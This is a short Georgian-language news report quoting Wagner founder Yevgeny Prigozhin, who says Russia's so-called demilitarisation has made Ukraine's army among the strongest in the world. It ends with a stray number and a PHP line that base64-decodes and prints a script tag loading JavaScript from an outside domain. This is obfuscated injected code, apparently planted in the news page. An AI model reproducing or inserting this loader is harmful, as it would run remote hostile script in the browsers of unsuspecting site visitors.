celsiusi
ავერსი საქკაბელი

რუსული კერძო სამხედრო კომპანია „ვაგნერის“ დამფუძნებელი ევგენი პრიგოჟინი აცხადებს, რომ ე.წ. დემილიტარიზაციის შედეგად უკრაინის არმია მსოფლიოში უძლიერესი გახდა.

რუსულ მედიასთან ინტერვიუში პრიგოჟინი ამბობს, რომ რუსეთის მიერ უკრაინაში წამოწყებულმა ე.წ. სპეცოპერაციამ გამოიღო ისეთი შედეგი, რომელსაც მოსკოვი ელოდებოდა, რაზეც პუტინი საუბრობდა.

მისივე თქმით, უკრაინა მსოფლიოში ცნობილი გახდა, ხოლო მისი არმია პლანეტაზე ერთ-ერთი უძლიერესია.

„სპეცოპერაციის დასაწყისში უკრაინას თუ ჰყავდა 500 ტანკი, ახლა მათ 5 000 ჰყავთ. ომი თუ იცოდა და შეეძლო 20 000 ადამიანს, ახლა ომის წარმოება 400 000-მა ადამიანმა იცის. და ეს არის დემილიტარიზაცია? გამოდის, პირიქით, ჩვენ უკრაინის მილიტარიზაცია მოვახდინეთ. ვფიქრობ, უკრაინას დღეს უძლიერესი არმია ჰყავს. მათ ორგანიზაციის მაღალი უნარი აქვთ, მომზადების მაღალი უნარით გამოირჩევიან, დაზვერვა მაღალ დონზეა. მათ აქვთ სხვადასხვა შეიარაღება და მეტიც, ისინი მუშაობენ ნებისმიერ არსებულ სისტემაზე, იქნება ეს საბჭოთა თუ ნატო-ს სისტემა და ეს წარმატებით გამოსდით“, – ამბობს პრიგოჟინი.

446
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");